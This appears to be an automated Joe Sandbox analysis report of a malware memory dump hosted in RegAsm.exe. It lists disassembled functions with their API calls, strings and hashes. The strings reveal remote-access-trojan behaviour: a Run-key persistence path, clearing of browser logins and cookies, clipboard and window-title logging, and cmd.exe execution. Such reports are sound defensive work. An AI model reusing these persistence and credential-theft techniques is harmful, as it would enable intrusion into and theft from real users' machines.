                                                        • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413858
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseCreateValue
                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                        • API String ID: 1818849710-1051519024
                                                        • Opcode ID: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
                                                        • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                                        • Opcode Fuzzy Hash: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
                                                        • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                                        Function 0040DFE1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                                          • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                                          • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                        • String ID: bad locale name
                                                        • API String ID: 3628047217-1405518554
                                                        • Opcode ID: 0e967f5f4c551f764c071b3c3fecd2d0a166eebc37c8bba363630da575d49789
                                                        • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                                        • Opcode Fuzzy Hash: 0e967f5f4c551f764c071b3c3fecd2d0a166eebc37c8bba363630da575d49789
                                                        • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                                        Function 004137AA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046612C), ref: 004137B9
                                                        • RegSetValueExA.ADVAPI32(0046612C,?,00000000,?,00000000,00000000), ref: 004137E1
                                                        • RegCloseKey.ADVAPI32(0046612C), ref: 004137EC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseCreateValue
                                                        • String ID: Control Panel\Desktop
                                                        • API String ID: 1818849710-27424756
                                                        • Opcode ID: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
                                                        • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
                                                        • Opcode Fuzzy Hash: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
                                                        • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
                                                        Function 00416C68 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                                        • ShowWindow.USER32(00000009), ref: 00416C9C
                                                        • SetForegroundWindow.USER32 ref: 00416CA8
                                                          • Part of subcall function 0041CE2C: AllocConsole.KERNEL32 ref: 0041CE35
                                                          • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                          • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                                                        • String ID: !D@
                                                        • API String ID: 3446828153-604454484
                                                        • Opcode ID: 4d9bf94020eca6f9e295162147b2deb229949cce80f8bc9c3a6d36dbd144fb99
                                                        • Instruction ID: 9f5213224becab59645eda34593d96b16d6ada18beeab21aaf628210512d7754
                                                        • Opcode Fuzzy Hash: 4d9bf94020eca6f9e295162147b2deb229949cce80f8bc9c3a6d36dbd144fb99
                                                        • Instruction Fuzzy Hash: ECF05E70149340EAD720AB62ED45AFA7B69EB54341F01487BF909C20F2DB389C94865E
                                                        Function 00416129 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExecuteShell
                                                        • String ID: /C $cmd.exe$open
                                                        • API String ID: 587946157-3896048727
                                                        • Opcode ID: df79394fdd2e8ac4c6a51a4d6bf5cb7422c6ad95fc7d3df390015c01fd08e55b
                                                        • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                                        • Opcode Fuzzy Hash: df79394fdd2e8ac4c6a51a4d6bf5cb7422c6ad95fc7d3df390015c01fd08e55b
                                                        • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                                        Function 0040140A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                        • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressHandleModuleProc
                                                        • String ID: GetCursorInfo$User32.dll
                                                        • API String ID: 1646373207-2714051624
                                                        • Opcode ID: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                        • Instruction ID: 8b26e8b19aea132afe7ec2793fcae50f4a2deac5c44528798ee909e27cd98dc2
                                                        • Opcode Fuzzy Hash: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                        • Instruction Fuzzy Hash: 6BB092B4981740FB8F102BB0AE4EA193A25B614703B1008B6F046961A2EBB888009A2E
                                                        Function 004014AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
                                                        • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: GetLastInputInfo$User32.dll
                                                        • API String ID: 2574300362-1519888992
                                                        • Opcode ID: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                        • Instruction ID: d02e03e3b89f99dad65f23c179d95e13f318a7fd709defe56253aab8848571e2
                                                        • Opcode Fuzzy Hash: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                        • Instruction Fuzzy Hash: EFB092B8580300FBCB102FA0AD4E91E3A68AA18703B1008A7F441C21A1EBB888009F5F
                                                        Function 00456C9A Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID:
                                                        • API String ID: 269201875-0
                                                        • Opcode ID: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                        • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                                        • Opcode Fuzzy Hash: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                        • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                                        Function 0040C047 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                                        • Cleared browsers logins and cookies., xrefs: 0040C130
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                        • API String ID: 3472027048-1236744412
                                                        • Opcode ID: 857d3cd121560083d8ce3f08402db4584d0000cc5e9f96a8e1a49aed9ab164ab
                                                        • Instruction ID: 5a72b8a34604a64e244bad04561a930bad76f77e78bf22f3e088d6afb7384554
                                                        • Opcode Fuzzy Hash: 857d3cd121560083d8ce3f08402db4584d0000cc5e9f96a8e1a49aed9ab164ab
                                                        • Instruction Fuzzy Hash: A431A805648381EDD6116BF514967AB7B824A53748F0882BFB8C4373C3DA7A4808C79F
                                                        Function 0040A564 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0041C5E2: GetForegroundWindow.USER32 ref: 0041C5F2
                                                          • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32 ref: 0041C5FB
                                                          • Part of subcall function 0041C5E2: GetWindowTextW.USER32 ref: 0041C625
                                                        • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                                        • Sleep.KERNEL32(00000064), ref: 0040A638
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Window$SleepText$ForegroundLength
                                                        • String ID: [ $ ]
                                                        • API String ID: 3309952895-93608704
                                                        • Opcode ID: 0877f6620f6187a1062b87b3f34e88cc83cbee9ae63c8039862e0d8bb1bff125
                                                        • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                                                        • Opcode Fuzzy Hash: 0877f6620f6187a1062b87b3f34e88cc83cbee9ae63c8039862e0d8bb1bff125
                                                        • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                                                        Function 00443AD3 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                        • Instruction ID: 2af8e1c260e5220142bf0b5f8a7e988c949d9a3a1697e0ff4d6bcf25ce69da1b
                                                        • Opcode Fuzzy Hash: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                        • Instruction Fuzzy Hash: 7E01F2B26093557EFA202E786CC2F67630DCB51FBAB31033BB520612D2DB68DD40452C
                                                        Function 00443B52 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                        • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                                                        • Opcode Fuzzy Hash: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                        • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                                                        Function 0041C516 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                        • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C543
                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0041C568
                                                        • CloseHandle.KERNEL32(00000000), ref: 0041C576
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$CloseCreateHandleReadSize
                                                        • String ID:
                                                        • API String ID: 3919263394-0
                                                        • Opcode ID: 253de0e05f1e183a51722a251bf095503662c065c08e6289a01aaeef394dcb57
                                                        • Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
                                                        • Opcode Fuzzy Hash: 253de0e05f1e183a51722a251bf095503662c065c08e6289a01aaeef394dcb57
                                                        • Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
                                                        Function 0041C26E Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                        • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                        • CloseHandle.KERNEL32(00000000), ref: 0041C2C4
                                                        • CloseHandle.KERNEL32(00000000), ref: 0041C2CC
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseHandleOpenProcess
                                                        • String ID:
                                                        • API String ID: 39102293-0
                                                        • Opcode ID: 81942e7addce2a1bdc39bfb83f2669cd8d6753e4bd6c5855ff2ce9cbe7850470
                                                        • Instruction ID: 82f86893bb8475317186349f6084970b7a3011258d8579340058f5d8518f4318
                                                        • Opcode Fuzzy Hash: 81942e7addce2a1bdc39bfb83f2669cd8d6753e4bd6c5855ff2ce9cbe7850470
                                                        • Instruction Fuzzy Hash: 9C01F231680215ABD61066949C8AFA7B66C8B84756F0001ABFA08D22A2EF74CD81466A
                                                        Function 004398E3 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                                          • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                                        • _UnwindNestedFrames.LIBCMT ref: 00439911
                                                        • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                                        • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                        • String ID:
                                                        • API String ID: 2633735394-0
                                                        • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                        • Instruction ID: 1eef882e9718bbd9a0ab38cd68ce054dbb3f9d4064fa539f417e17899f1f7293
                                                        • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                        • Instruction Fuzzy Hash: 38010532000109BBCF125F56CC01EDA3BAAEF5C754F05901AF95865221C3BAE862ABA4
                                                        Function 0041941E Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MetricsSystem
                                                        • String ID:
                                                        • API String ID: 4116985748-0
                                                        • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                        • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                                                        • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                        • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
                                                        Function 00438FB1 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                                        • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                                        • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                                          • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                                        • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                        • String ID:
                                                        • API String ID: 1761009282-0
                                                        • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                        • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                                                        • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                        • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                                                        Function 00442CAD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorHandling__start
                                                        • String ID: pow
                                                        • API String ID: 3213639722-2276729525
                                                        • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                        • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                                                        • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                        • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                                                        Function 00449EBC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • WideCharToMultiByte.KERNEL32(000000FF,00000000,00000006,00000001,?,?,00000000,?,00000000,?,?,00000000,00000006,?,?,?), ref: 00449F8F
                                                        • GetLastError.KERNEL32 ref: 00449FAB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ByteCharErrorLastMultiWide
                                                        • String ID: PkGNG
                                                        • API String ID: 203985260-263838557
                                                        • Opcode ID: d1185fb95bfff78fff583c453b007e19375680cfc0f7d37f8e74ebb942ffdfee
                                                        • Instruction ID: e4919e29a80df6b7ced925805d10dfcffaa1b378e184719e11b938f1b8f94c7b
                                                        • Opcode Fuzzy Hash: d1185fb95bfff78fff583c453b007e19375680cfc0f7d37f8e74ebb942ffdfee
                                                        • Instruction Fuzzy Hash: 2331E430200201ABFB21EF56C845BAB7768EF45721F15016BF815C7391DB38CD45E7A9
                                                        Function 0040B783 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                        • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Init_thread_footer__onexit
                                                        • String ID: [End of clipboard]$[Text copied to clipboard]
                                                        • API String ID: 1881088180-3686566968
                                                        • Opcode ID: 7be63757e29b9f91be4cc1fce50211db745ac7e2ddcf3fa0e25e131e1c8bf245
                                                        • Instruction ID: 844f446031992ee5170c212df839aebd4a436c67f2956c9e8fe8aff684c3a130
                                                        • Opcode Fuzzy Hash: 7be63757e29b9f91be4cc1fce50211db745ac7e2ddcf3fa0e25e131e1c8bf245
                                                        • Instruction Fuzzy Hash: 30217131A102198ACB14FBA6D8929EDB375AF54318F10443FE505771D2EF786D4ACA8C
                                                        Function 00451BB7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ACP$OCP
                                                        • API String ID: 0-711371036
                                                        • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                        • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                                        • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                        • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                                                        Function 0044B7B1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81fileCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0044B85B
                                                        • GetLastError.KERNEL32 ref: 0044B884
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite
                                                        • String ID: PkGNG
                                                        • API String ID: 442123175-263838557
                                                        • Opcode ID: 9f33f136d580808b36a549075194831cac44b680ed95d57240af363647088f83
                                                        • Instruction ID: 9972a58bdd01e134d13becd973f3089a2f7b3635eb9ddb95e5d59f4384582b5e
                                                        • Opcode Fuzzy Hash: 9f33f136d580808b36a549075194831cac44b680ed95d57240af363647088f83
                                                        • Instruction Fuzzy Hash: B2316F31A00619DBCB24DF59DD8099AF3F9FF48301B1485AAE909D7261E734ED81CBA8
                                                        Function 0044B6D2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77fileCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0044B76D
                                                        • GetLastError.KERNEL32 ref: 0044B796
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite
                                                        • String ID: PkGNG
                                                        • API String ID: 442123175-263838557
                                                        • Opcode ID: 482fa6ac77512a0fc819500aa413458c203250297fd7de672378db3e029a087c
                                                        • Instruction ID: c865f2f287ade0309940dd9d446f9ab1351fd896516eb6f8948e0fb5ca6ebdce
                                                        • Opcode Fuzzy Hash: 482fa6ac77512a0fc819500aa413458c203250297fd7de672378db3e029a087c
                                                        • Instruction Fuzzy Hash: 69219435600219DFDB14CF69D980BEAB3F9EB48312F1048AAE94AD7251D734ED85CB64
                                                        Function 00404FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                                          • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                        • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                                        Strings
                                                        • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LocalTime
                                                        • String ID: KeepAlive | Enabled | Timeout:
                                                        • API String ID: 481472006-1507639952
                                                        • Opcode ID: 145f269d181a8435875c36411829170d0c63d951855ea4e88e6edb1186bb4574
